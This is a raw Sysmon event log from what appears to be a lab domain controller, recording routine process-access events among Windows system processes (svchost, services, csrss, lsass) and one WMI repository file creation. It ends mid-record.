15:51:01.316{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000972Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.316{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000971Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.316{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000970Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.316{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000969Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.316{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000968Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.316{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000967Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.316{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000966Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.316{D28789B6-7C62-5FA1-0A00-000000008801}852936C:\Windows\system32\services.exe{D28789B6-7C65-5FA1-2200-000000008801}2380C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000965Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.316{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C65-5FA1-2200-000000008801}2380C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000964Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.316{D28789B6-7C62-5FA1-0A00-000000008801}852928C:\Windows\system32\services.exe{D28789B6-7C65-5FA1-2200-000000008801}2380C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000963Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.300{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000962Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.300{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000961Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.300{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000960Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.207{D28789B6-7C64-5FA1-1300-000000008801}12241900C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000959Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.207{D28789B6-7C64-5FA1-1300-000000008801}12241900C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000958Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.207{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C65-5FA1-2100-000000008801}2320C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000957Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.191{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C65-5FA1-2000-000000008801}2308C:\Windows\System32\dsregcmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000956Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.191{D28789B6-7C64-5FA1-1000-000000008801}11441264C:\Windows\system32\svchost.exe{D28789B6-7C65-5FA1-2000-000000008801}2308C:\Windows\System32\dsregcmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+2039|c:\windows\system32\UBPM.dll+2b50|c:\windows\system32\UBPM.dll+e71d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000955Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.191{D28789B6-7C64-5FA1-1000-000000008801}11442220C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0900-000000008801}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\SYSNTFY.dll+1ad9|C:\Windows\System32\RPCRT4.dll+50b34|C:\Windows\System32\RPCRT4.dll+25cd0|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000954Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.175{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000953Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.175{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000952Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.175{D28789B6-7C64-5FA1-1300-000000008801}12241900C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000951Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.160{D28789B6-7C64-5FA1-1300-000000008801}12241900C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000950Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.160{D28789B6-7C64-5FA1-1300-000000008801}12241900C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000949Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.160{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C65-5FA1-1F00-000000008801}2276C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000948Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.144{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C65-5FA1-1E00-000000008801}2268C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000947Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.144{D28789B6-7C64-5FA1-1000-000000008801}11441264C:\Windows\system32\svchost.exe{D28789B6-7C65-5FA1-1E00-000000008801}2268C:\Windows\system32\compattelrunner.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000946Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000945Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.144{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000944Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:01.113{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exeC:\Windows\System32\wbem\Repository\WRITABLE.TST2020-11-03 15:51:01.113 10341000x8000000000000000943Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 